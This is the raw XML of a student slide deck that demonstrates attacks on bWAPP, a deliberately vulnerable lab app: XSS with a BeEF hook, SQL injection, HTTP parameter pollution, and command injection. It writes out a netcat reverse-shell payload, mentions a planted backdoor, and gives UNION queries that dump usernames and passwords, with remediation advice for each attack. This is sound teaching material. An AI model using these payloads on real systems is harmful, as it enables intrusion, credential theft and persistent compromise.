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2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4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58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65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3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4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3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1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5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2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7C847-5275-4748-A6FE-C50C3D90A97C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931DC-CD46-4BDD-8F12-F25D287C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3791-A8BD-432C-A298-DC9103F3B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QaSSTP presentation - bWapp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8ABCE-D20F-D2CC-441A-FDE0F4102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Terec Andrei</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Popovici George-Ioan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Pop David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B9CB36-9C5F-AD06-1D14-DB5C3CA37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8" y="564311"/>
            <a:ext cx="11450486" cy="572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C0591-6FF4-7B17-7FEB-1B3FA2FDE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27" y="761769"/>
            <a:ext cx="10676545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3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5D774-CDCE-EEF6-E4D2-C6E9C922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41" y="757958"/>
            <a:ext cx="10592718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15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2FB-2AF8-37E1-00BD-8174875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CCF9-EC92-7DCF-CFE7-2D75D66F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remediate, the user input should be sanitezed with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>htmlspecialchars </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>function or the entries from the database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2775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2FB-2AF8-37E1-00BD-8174875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CCF9-EC92-7DCF-CFE7-2D75D66F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website sends a ping to the ip specified.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Because we don’t see the output of the command, we will try to inject a sleep command. If the website takes longer to responde, we know we successfully injected the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FE15B-9959-A8E6-5C33-B8EA7834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07" y="4515216"/>
            <a:ext cx="571579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2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2FB-2AF8-37E1-00BD-8174875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CCF9-EC92-7DCF-CFE7-2D75D66F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website sends a ping to the ip specified.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Because we don’t see the output of the command, we will try to inject a sleep command. If the website takes longer to responde, we know we successfully injected the command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FE15B-9959-A8E6-5C33-B8EA7834E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007" y="4515216"/>
            <a:ext cx="571579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8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2FB-2AF8-37E1-00BD-8174875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CCF9-EC92-7DCF-CFE7-2D75D66F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Now that we can send commands, we will get a reversed shell and install a backdoor. We will send the payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" b="1"/>
              <a:t>127.0.0.1|nc 10.0.2.15 4747 -e /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>And we will add a new endpoint at inserted_backdoor.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237027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2FB-2AF8-37E1-00BD-8174875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B2B217-BEEF-8296-32BE-5667FC1D72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6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2414328"/>
            <a:ext cx="12192000" cy="372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6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2FB-2AF8-37E1-00BD-8174875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DB8D4-DE4A-C7C3-4675-5F36CF5BF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2893593"/>
            <a:ext cx="12192000" cy="202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3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5B2FB-2AF8-37E1-00BD-8174875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CCF9-EC92-7DCF-CFE7-2D75D66FB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remediate, the user input should be sanitezed with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>escapeshellcmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> function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32743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48B3-8D98-C6E3-2044-9A4D38E8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bWapp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B0778-D3EE-5D8E-31C5-9C9D8305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bWAPP, or a buggy web application, is a free and open source deliberately insecure web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>bWAPP is a PHP application that uses a MySQL database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>It can be hosted on Linux/Windows with Apache/IIS and MySQL.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2438234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0B51E-9468-41E5-CE31-CA84BE60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C23D-793D-B80A-8FA3-600D3CFD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web app you can search for your favorite movie by title</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will test if the site considers this input valid, which it will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24F58-0267-F7F7-2CC1-93A6D40E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985" y="3800198"/>
            <a:ext cx="682085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759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68A22-C5AA-26A0-B295-0F2B3278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1C22D-492D-2CCF-EC87-C903F554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does, since it did not specify that the search query is invalid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now we find out how many columns are in the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DD51B-7D1E-A6B9-6C59-E0A5B53A0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37" y="4073147"/>
            <a:ext cx="4389913" cy="1375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2F95C-2B78-7ABB-9B4A-5B8BAF6B5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062" y="4073147"/>
            <a:ext cx="4370401" cy="137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33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3C08-7049-C317-DDED-6B0049449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2968-354A-A2FE-FDA4-CB2EE570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63CE-1C72-37FF-7E46-D4CA59F58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we input this to show which columns of the table are represented on the site’s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64F6E-7328-4B63-31AA-12051CFFA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011" y="4020344"/>
            <a:ext cx="698279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66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15A1-676C-B564-F394-4280EBDE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D1CC-3B59-221F-0E8F-78F202BB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can get whatever we want from the database into one of the columns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C02CDF-B158-A931-47A5-76976242B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327" y="3429000"/>
            <a:ext cx="675416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51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4F42-2D2A-4CC4-6AAF-A48CAEF7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D14B3-DF06-46BD-D5AA-447ACFB9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GROUP_CONCAT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,'\n') from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>='BASE TABLE’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This shows all the tables of the database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B7B3C-0AA5-CC9B-930B-38667F3E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79" y="3911047"/>
            <a:ext cx="4299442" cy="289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9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EF37-973F-B2E8-1936-FE13ECA6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2ACB2-2955-6AFA-2700-E92202490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GROUP_CONCAT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,'\n') from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>='users’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This shows the columns of the table “users”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B9D62-BE85-7C20-3C36-3F934263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222" y="3961680"/>
            <a:ext cx="5453555" cy="273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84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352A-A8DD-FC89-C8B0-6A2575E0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F520-63D2-7570-1515-B68E1CDF6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GROUP_CONCAT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>login,":",password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,"\n") from users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This shows the login and password of all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4A7D3-E532-B8CA-1F46-6F4F085F8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563" y="3846356"/>
            <a:ext cx="7487695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15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33145-E58B-CE52-A30D-FAE05C16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67B2-793E-2EF1-55B2-79797D2B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well-known methods to remediate this are using prepared statements with parametrized queries or properly constructed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439499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8E5D-CD6E-F3DE-1B35-EFE1864BA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Parameter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867F-C04D-B6DC-F908-298F47BB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web app that uses HTTP requests you can vote for your favorite movie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2D241-18DC-4F4F-AE41-DA2CC168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" y="3429000"/>
            <a:ext cx="3391291" cy="888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A00C8-A17F-AF4C-8CD7-DD7E34176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95" y="3059307"/>
            <a:ext cx="3697400" cy="3180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FA189-4206-6380-7F62-3E8E5E2DE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87" y="3429000"/>
            <a:ext cx="3367473" cy="8816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87C564-4D64-89F7-D8D3-99F887E024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171" y="6334278"/>
            <a:ext cx="4696480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332306-6693-8199-23FC-084E4CCC9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404" y="4537398"/>
            <a:ext cx="3954838" cy="22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43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D915-5030-8296-9582-97AC21F9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Parameter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FEE8-0A75-C50E-191A-B9E7A66D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 does not filter out query characters (I could name myself ampersand)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194F-CDA4-C90D-B7DA-92BD179C6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774" y="3019166"/>
            <a:ext cx="697327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5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611E-6CA1-AD08-E72D-FD62C3E2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on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13E6-89F1-0061-DA0B-FA13EA24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Mixed approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Offensive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Terec Andrei</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Popovici George-Ioan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Defensive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Pop David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96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629B-3916-3359-3CBF-D1D7D6C4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Parameter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155B-0FDC-59D6-AB38-B01F7D323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the Iron Man (which has the id of 2) movie to always win, so we abuse the fact that PHP only registers the last appearance of a parameter in an HTTP request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3831B-AC45-64A0-5075-8EBE9A7EE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02" y="4151217"/>
            <a:ext cx="51442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47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2D0D-2C7A-84EB-2B8A-32FB164E6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Parameter Pollution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847AD-1D30-1B91-BC7C-CF55285F6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504074"/>
            <a:ext cx="4772484" cy="3660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AD184-0A50-3933-254D-CE8058EBE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35" y="3084642"/>
            <a:ext cx="4571835" cy="1204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9A4EB6-54FA-C6F9-43C7-3121EB9FF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4510065"/>
            <a:ext cx="5601482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0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DAE9-3366-3BF7-F556-AD43C1CA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Parameter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B458E-972E-3D6E-8AFE-D825ADEC0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remediate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>this are to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ensure that user input is URL-encoded before it is embedded in a URL or throw an error in case of multiple parameters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16006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72E5-95D6-B1A6-D95F-690A348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331C-E27F-576E-7334-24CB7DB6A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  <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP Parameter Pollution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="219892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A372-890F-437F-60BC-BCB9C5EC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EA81-6A09-6958-5AC2-3FEAB0D8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will test a simple script tag to see if is escaped correctly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63416B-79C3-77F1-16D5-1265C4F1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70" y="3553152"/>
            <a:ext cx="6639882" cy="311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2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A372-890F-437F-60BC-BCB9C5EC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EA81-6A09-6958-5AC2-3FEAB0D8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after hitting submit, we see the script was executed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D1F1E-1A44-5EAC-5B33-2C6CC111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06" y="3722913"/>
            <a:ext cx="8025009" cy="292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A372-890F-437F-60BC-BCB9C5EC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EA81-6A09-6958-5AC2-3FEAB0D8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now the beef project to exploit this vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>After we installed the hook, every user who visits this website will also have this hook installed for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CDECB-F2B0-30AC-CDA9-AA7E5B1C1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6" r="36410" b="10419"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2156902" y="4020344"/>
            <a:ext cx="6716511" cy="24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A372-890F-437F-60BC-BCB9C5EC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47EA81-6A09-6958-5AC2-3FEAB0D8B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can use now the beef project to exploit this vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>After we installed the hook, every user who visits this website will also have this hook installed for them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CDECB-F2B0-30AC-CDA9-AA7E5B1C1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6" r="36410" b="10419"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2156902" y="4020344"/>
            <a:ext cx="6716511" cy="242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5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C50427-68ED-4D4E-7493-3B20F60BF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57" y="564311"/>
            <a:ext cx="11450486" cy="5729377"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167864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389</TotalTime>
  <Words>668</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>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Tw Cen MT</vt:lpstr>
      <vt:lpstr>Circuit</vt:lpstr>
      <vt:lpstr>QaSSTP presentation - bWapp</vt:lpstr>
      <vt:lpstr>bWapp project</vt:lpstr>
      <vt:lpstr>Approach on security</vt:lpstr>
      <vt:lpstr>Vulnerabilities</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>XSS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SQL Injection</vt:lpstr>
      <vt:lpstr>HTTP Parameter Pollution</vt:lpstr>
      <vt:lpstr>HTTP Parameter Pollution</vt:lpstr>
      <vt:lpstr>HTTP Parameter Pollution</vt:lpstr>
      <vt:lpstr>HTTP Parameter Pollution</vt:lpstr>
      <vt:lpstr>HTTP Parameter Pollution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QaSSTP presentation - bWapp</dc:title>
  <dc:creator>Terec Andrei Sorin</dc:creator>
  <cp:lastModifiedBy>George Popovici</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-12T08:28:26Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-13T17:13:06Z</dcterms:modified>
</cp:coreProperties>
</file>